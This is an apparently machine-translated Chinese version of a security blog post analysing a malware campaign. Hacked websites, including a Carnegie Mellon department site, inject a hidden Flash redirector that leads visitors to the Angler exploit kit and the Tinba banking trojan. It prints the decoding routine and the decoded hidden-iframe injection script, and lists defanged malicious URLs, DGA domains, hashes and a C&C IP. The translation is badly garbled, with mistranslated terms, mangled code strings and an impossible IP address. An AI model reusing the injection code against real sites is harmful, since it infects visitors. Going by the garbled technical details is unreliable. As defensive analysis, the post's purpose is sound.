安全事件很少不相关。连接这些点可以帮助我们更好地了解涉及网络犯罪的底层建筑和团体。

自7月初以来,我们一直在跟踪一个恶意软件活动,利用合法的网站,DNS记录和利用套件运营商。

这种机制本身并不是新的东西,因为大多数驱动器下载是来自合法站点的恶意重定向的结果,并且旋转URL用作门口以利用套件登陆页面。

但这种特定的实例是巧妙地使用相同的基于闪存的重定向脚本的唯一,该脚本也允许我们将类似的网站妥协联系在一起。

在这篇文章中,我们将展示这个活动是如何运作的,并为可能受到影响的网站所有者提供妥协的指标。

概要

flow

黑客攻击网站

成千上万的网站被黑客攻击,并在其所有者不知情的情况下执行恶意重定向。以下是一些例子:

hxxp://a7lasura.com/ hxxp://alfajrhajj.com/ hxxp://allforkids.tv/ hxxp://www.aguisa.fr/ hxxp://www.angelforum.at/ hxxp:// www。kasianova.pl/ hxxp://www.krawallbrueder.com/ hxxp://www.movi​​emug.com/ hxxp://www.panelreklamowy.pl/ hxxp://www.peoplesoftonline.com/ hxxp:// www。stat.cmu.edu/ hxxp://www.tattoosleeveIdeas.net///www.televisionTunes.com/ hxxp://www.utanpotlassport.hu/ hxxp://www.valentiaisland.ie/ hxxp://www.venafro.info/ hxxp://www.videoklipove.com/ ...

Carnegie Mellon University统计系(www.stat.cmu.edu.)恰好是其中之一。

为了说明这一运动,我们将详细研究这一运动。

网站

使用免费网站扫描仪Sucuri,我们注意到服务器运行了一个过时的apache(2.2.15),它有几个漏洞

我们还注意到这个站点是建立在Drupal内容管理系统(CMS)上的,CMS最近出现了严重的SQL注入漏洞已经在野外剥夺了

当然,可以有其他因素导致网站被攻击,例如:密码差,不安全的文件权限等。

Not having access to the website itself, we can only see the outward-facing symptoms, which in this case is a malicious piece of code inserted at the very bottom of the main page’s source code, and happens to be the signature of this particular operation:

code_injection

这只是用于嵌入页面内的Flash应用程序的代码,其中包含某些参数,使其不可见于肉眼。“名称”变量“EITEST”似乎在所有受损站点上静态使用。

该代码非常嘈杂(单行iframe将足够),并且应根据其常量格式和放置来轻松发现。

但是,只有每次访问站点(IP地址日志记录)只注射一次。如果您再次重新审视页面,则会得到此项(请注意其之间的空白行空间脚本身体注入代码的标签):

Commonal_html.

这可能使网站所有者识别以来,因为他们自己的IP地址很可能已经被标记。

子域和DNS魔法

我们感兴趣的一部分(这就是它提出了标志的原因)是该闪存应用程序的源URL。这是一个子域.us.to.

Urlusto.

事实上,该URL是动态的,并且频繁变化。这是我们记录的一些缺点:

hxxp://pole.us.to/ hxxp://popo.us.to/ hxxp://pops.us.to/ hxxp://pum.us.to/ hxxp://retr.us.to/hxxp://server71.us.to/ hxxp://sflv.us.to/ hxxp://site7.us.to/ hxxp://tda.us.to/ hxxp://tubes.us.to/hxxp://uilo.us.to/ hxxp://ulmi.us.to/ ...

那么到底是什么我们?它是一个网址缩短器:

ustosite

使用Tonic域名注册表:

滋补

和运营的免费DNS服务afraid.org。

whoisdetails.

天啊

有许多恶意软件报告涉及危险.ORG,就像其他免费的DNS服务一样,糟糕的家伙经常(ab)使用它们。此类服务允许任何人注册子域,因此构建了一个可以使用和丢弃的大型URL池。

有趣的是,最近帖子SWITCH安全博客概述了这个问题:“当你注册一个域时,默认的、免费的设置是公开的”和“创建一个子域指向完全不相关的东西是很容易的”。

UstorobText.

图片由Robtex提供

我们是131,167主机最受欢迎的域名:

topdomains

值得注意的是英国.TO.(也许是一个遥远的堂兄)在这里也列出了我们的日志中,我们从2014年3月到2014年初观察到这个领域的类似恶意活动,这是我们开始检测不良活动的时候我们

子域名

对于记录,有其他域在此广告系列中被滥用。许多人有异国情调顶级域名名称(.ML..GA等等)

恶意子域名(hite.us.to)位于148.251.56.156,这是一个位于24940德国的IP地址自治系统(hetzner在线ag)。

IP.

如果您查看其报告,则Virustotal还为您提供每日更改该IP在这里

恶意的Flash文件

嵌入在所有黑客网站中的Rogue代码类似,并指向闪存文件(MD5:F738A21FB3F8314BAB49CBF4C57AC1FE)。要弄清楚其Modus Operandi,我们需要在动态或静态分析它。

不幸的是,动态分析未能提供任何具体的结果,因此我们选择了静态分析。

加载闪存文件Adobe的SWF调查员显示一些有趣的位,例如呼叫外部接口用于将JavaScript代码执行到加载Flash文件的页面中:

SWF_investigator

但总的来说,这份文件仍然有点神秘,主要是因为它相当模糊,难以阅读。下一步将包括将SWF反编译为纯动作脚本代码,我们可以使用:

认可

此操作脚本代码的最后一部分非常困扰:

AS2

FlashVars变量中CSS.id ..(从CMU站点中的原始嵌入代码)传递给ActionScript代码。

首先,我们需要弄清楚解密程序(特别感谢杰罗马·杜加ClarityAd为帮助)如下所示,因此我们最终可以看到该文件的用途。

var __arg1 = " gxcn”;var loc1 = " ";var loc2 = 0;var m = 2;while (loc2 < arg1.length) {loc1 = loc1 + String.fromCharCode(arg1.charCodeAt(loc2) - m);+ + loc2;} console.log (loc1);

现在我们可以解码脚本的其余部分(如图所示绿色):

var arg1:string =“tgvwtp \”pcxkicvqt0wugtcigpv =“;//返回Navigator UserAgent;
var arg1:string =“oukg”;/ / msie
var arg1:string =“tx <33”;// RV:LL
var arg1:string =“qrgtc”;//歌剧
var arg1:string =“ugvvkogqwv * hwpevkqp * +} xct \”f \“?\”fqewogpv0etgcvggggggpv *)fkx)+ = f0kf?eqwpvgtaxcnwg)= f0uv {ng0rqukvkqp \“?\”)cduqnwvg)= f0uv {ng0nghv \“?\”)922rz)= f0uv {ng0vqr \“?\”)/ 32222Rz)= f0kppgtjvon \“?\”)> khtcog \“ute?$ jvvr <11”;// setTimeout (function () {var d = document.creatElement (‘div’); id = ‘counter_value’; d.style.position = ‘absolute’; d.style.left = ‘700px’; d.style.top = ‘-1000px’; d.innerHTML = ‘
var arg1:string =“gxcn”;// eval.
var arg1:string =“$ @> 1khtcog @)= fqewogpv0dqf {0crrgpfejknf * f + = .77 + =”;//“> ';document.body.appendchild(d);},55);

正如你所看到的,为了隐藏iframe,坏人做了很多工作。再加上ActionScript代码被编译成SWF,你就明白为什么Flash文件是完美的“特洛伊木马”了:漂亮的外部动画和糟糕的内部负载。

此中介闪存文件还可充当基于某些标准重定向流量的过滤器(即受害者的浏览器)。这是我们越来越多地看到的东西最近的攻击,特别是与垂钓者开发工具包。

在这种情况下,一旦IFrame URL命中目标,实际上就有两个可能的方案。您要么被默默地重定向到成人网站或利用页面。

成人网站:

Adult_site.

要清楚,在浏览大学网站时未显示成人页面。相反,它是默默地加载的,也许是为了产生人工交通。

剥削(钓鱼ek)

访问Carnegie Mellon网站的统计部门并送达流氓Flash代码后,一块JavaScript(window.self.location.replace.)加载了一个开发工具包的登陆页面。

登录页面推出Internet Explorer Exploit(CVE-2014-1776),它立即下载恶意二进制。闪光漏洞也被解雇,但感染已经发生。

exploit_redir.

那些利用套件登陆页面(钓鱼者爆炸套件)继续改变。以下是一些例子:

hxxp://qwe.surenesspreistratic.biz/zma97e66dd hxxp://two.cretlakiplas.in/5uf4zk6zne hxxp://one.drevlakyepa.in/i691h4uc7e hxxp://two.vregkialo.asia/cixjwz4v6h hxxp://一个。vavioplaty.asia/nbi78z5ejd hxxp://asd.calorimetrydancorchestra.biz/i3eovtoenu hxxp://qwe.drippingsoffal.biz/e4f92n296p ...

以下屏幕截图显示了Fiddler捕获并总结了重定向流程。

致使

恶意软件有效载(Tinba)

在此活动期间,我们观察到各种有效载荷,但为了简单起见,我们将专注于我们在访问Carnegie Mellon网站时收到的有效载荷。它是其中的一部分Tinba.偷窃家庭及其目标是将自己钩在用户的系统(特别是浏览器)中窃取个人信息,如银行凭据。

fileproperties

MD5:5808CC73C78263A8114EB205F510F6A7

执行后,它会启动一个名为Winver.exe(合法Windows文件)的新进程,注入:

过程

并创建本身的副本成%appdata%:

过分的

它还通过在运行密钥下创建条目来实现持久性:

runkey.

钩子

最后,木马试图连接回它的命令和控制服务器(C&C)通过查询不同的域(使用域生成算法),直到它找到一个工作的:

pqrronhyvuhc.ru yobydkkkdkk.ru yyxxgtwdoedk.ru vuttxypyqnos.ru fpoxmjgrixs.ru kjdeuqjyryyy.ru yydebipcrbpx.ru viqypwwxsbgd.ru hiyymnrbuebug.ru mxmmlqpqrjbj.ru  - >确定 - > 185.2222222.233.103

IP位于俄罗斯莫斯科的C&C接收从受感化的计算机中遇到的数据。

结论

总结了这一广告系列,这里有一些共同要素:

  • 具有相同嵌入式闪存代码的合法网站
  • 不断更改使用随机生成的子域的URL用于托管闪存应用程序
  • 使用相同的ActionScript代码库允许错误的家伙完全控制
  • 条件重定向到(也旋转)钓鱼者利用套件登陆页面提供最终有效载荷

网站注入可以在HTML源代码的底部轻松察觉。如果您是网站所有者并且您已发现此脚本,请确保查找您服务器上的其他感染迹象。代码本身代表着症状,但真正的罪魁祸首通常是一个允许坏人访问和刷新恶意URL的能力的后门(恶意壳或其他PHP代码)。对您的网站完全审核,包括针对过时的CMS软件和插件的补丁是必须的。

自由子域的使用(和滥用)是相当有问题的,因为短暂播放了Whack-a-mole游戏,最简单的解决方案是阻止可能包含合法站点的整个范围。

Flash应用程序的证明是最近的网络犯罪分子的选择工具,并与Java不同,其浏览器插件可以在没有太多后果的情况下禁用,删除Flash将导致严重降级的浏览体验。最好的行动方案是保持Flash播放器的最新,但仍然不会阻止JavaScript在浏览器中运行。

有些人会建议使用NoScript或类似工具来更好地控制所执行的内容。虽然不需要证明其有效性,但对于任何严重冲浪来说,它仍然是一个痛苦的解决方案。

毫无疑问,每次我们浏览互联网时,都会遭到数十次恶意重定向,结果可能会非常糟糕。

必威平台APPMalwarebytes反利用通过检测浏览器或其插件中的恶意行为来缓解此问题,以便您可以安静地冲浪,即使在您的计算机不是最新的情况下的(不推荐的)活动中。

虽然我们希望网站所有者将保持其网站修补和安全,第三方内容(脚本,广告)通常也是一种感染源。出于这个原因,旧的说“安全开始与你开始”仍然存在真实。

@jeromesegura